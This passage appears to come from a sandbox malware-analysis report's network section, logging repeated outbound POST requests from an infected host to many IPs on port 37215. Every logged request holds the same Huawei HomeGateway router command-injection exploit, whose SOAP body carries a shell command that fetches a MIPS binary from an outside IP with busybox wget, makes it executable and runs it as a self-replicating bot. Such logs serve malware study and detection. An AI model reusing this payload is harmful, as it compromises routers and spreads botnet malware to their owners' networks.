                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.2357352157.32.252.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276810884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.234325641.45.242.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276815891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.235923817.186.46.2337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276815891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.2354630157.234.228.8337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276843071 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.233895441.162.120.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276850939 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.235854841.224.168.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276856899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.235914041.36.224.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276865959 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.233650641.89.207.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276871920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.2360870157.116.115.9637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277309895 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.233565041.32.193.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277322054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
